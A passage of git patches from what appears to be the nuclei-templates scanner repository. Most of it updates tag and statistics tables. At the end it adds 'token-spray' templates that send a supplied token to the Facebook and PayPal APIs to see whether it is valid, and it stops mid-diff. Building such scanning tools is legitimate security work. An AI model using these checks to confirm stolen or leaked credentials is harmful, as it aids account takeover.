1 | | | | | | | | | -| natemail | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| oidc | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| frontpage | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| calendly | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| werkzeug | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| adiscon | 1 | | | | | | | | | -| twitter | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| yzmcms | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| matrix | 1 | | | | | | | | | -| distance | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| listserv | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| circleci | 1 | | | | | | | | | | codeigniter | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| cves2001 | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| distance | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| messaging | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| fcm | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| hubspot | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| deviantart | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| syslog | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| stripe | 1 | | | | | | | | | | adb | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| find | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | | pacsone | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| nerdgraph | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| etherpad | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| elasticsearch | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| circle | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| xmpp | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| sendgrid | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| matrix | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| twitter | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| photo | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | | stem | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| directions | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | | pivotaltracker | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| cve202 | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| contentkeeper | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| square | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| graph | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| instagram | 1 | | | | | | | | | +| package | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| mailgun | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| spotify | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| circleci | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| key | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| adiscon | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| asana | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| dahua | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| digitalocean | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| skycaiji | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| jumpcloud | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| jabber | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| phpshowtime | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| weather | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| bing | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 57c3d4e612..35c081239b 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 833 | daffainfo | 288 | cves | 837 | info | 749 | http | 2211 | -| lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | -| panel | 272 | dhiyaneshdk | 279 | exposed-panels | 269 | medium | 476 | network | 45 | -| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | -| rce | 214 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 196 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 165 | madrobot | 63 | file | 50 | | | | | +| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 | +| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 | +| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 | +| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 | +| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | | +| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | | +| rce | 215 | gy741 | 83 | takeovers | 65 | | | | | +| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | | +| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 166 | madrobot | 63 | file | 50 | | | | | From 0dd3b87aebfb2644e24714eb60546cb2132ee343 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Oct 2021 18:12:04 +0000 Subject: [PATCH 3110/4083] Auto README Update [Fri Oct 22 18:12:04 UTC 2021] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index bf87efc606..014ebb0a6a 100644 --- a/README.md +++ b/README.md @@ -42,16 +42,16 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 833 | daffainfo | 288 | cves | 837 | info | 749 | http | 2211 | -| lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | -| panel | 272 | dhiyaneshdk | 279 | exposed-panels | 269 | medium | 476 | network | 45 | -| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | -| rce | 214 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 196 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 165 | madrobot | 63 | file | 50 | | | | | +| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 | +| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 | +| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 | +| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 | +| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | | +| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | | +| rce | 215 | gy741 | 83 | takeovers | 65 | | | | | +| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | | +| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 166 | madrobot | 63 | file | 50 | | | | | **176 directories, 2416 files**. From ea644b4c84378353616abfd21f1753ff7460e535 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sat, 23 Oct 2021 10:55:34 +0700 Subject: [PATCH 3111/4083] Add Facebook API test --- token-spray/facebook.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 token-spray/facebook.yaml diff --git a/token-spray/facebook.yaml b/token-spray/facebook.yaml new file mode 100644 index 0000000000..a880196f5d --- /dev/null +++ b/token-spray/facebook.yaml @@ -0,0 +1,19 @@ +id: api-facebook + +info: + name: Facebook API Test + author: dwisiswant0 + reference: https://developers.facebook.com/tools/explorer/ + severity: info + tags: token-spray,facebook + +self-contained: true +requests: + - method: GET + path: + - "https://graph.facebook.com/me?access_token={{token}}" + + matchers: + - type: status + status: + - 200 \ No newline at end of file From 86376871e70ac36613c2924d7c9e7cfdea5391ab Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sat, 23 Oct 2021 11:13:04 +0700 Subject: [PATCH 3112/4083] Add PayPal API test --- token-spray/paypal.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 token-spray/paypal.yaml diff --git a/token-spray/paypal.yaml b/token-spray/paypal.yaml new file mode 100644 index 0000000000..9e44a47404 --- /dev/null +++ b/token-spray/paypal.yaml @@ -0,0 +1,22 @@ +id: api-paypal + +info: + name: PayPal API Test + author: dwisiswant0 + reference: https://developer.paypal.com/docs/api/overview/ + severity: info + tags: token-spray,paypal + +self-contained: true +requests: + - method: GET + path: + - "https://api-m.sandbox.paypal.com/v1/identity/oauth2/userinfo?schema=paypalv1.1" + headers: + Content-Type: application/json + Authorization: Bearer {{token}} + + matchers: + - type: status + status: + - 200 \ No newline at end of file From 6ba5ea9ec8f42b5424088c8fa3c70e99a4d68dfd Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 23 Oct 2021 14:12:55 +0530 Subject: [PATCH 3113/4083] Added additional matcher --- token-spray/facebook.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/token-spray/facebook.yaml b/token-spray/facebook.yaml index a880196f5d..8143cbc92c 100644 --- a/token-spray/facebook.yaml +++ b/token-spray/facebook.yaml @@ -13,7 +13,13 @@ requests: path: - "https://graph.facebook.com/me?access_token={{token}}" + matchers-condition: and matchers: + - type: word + part: header + words: + - 'application/json' + - type: 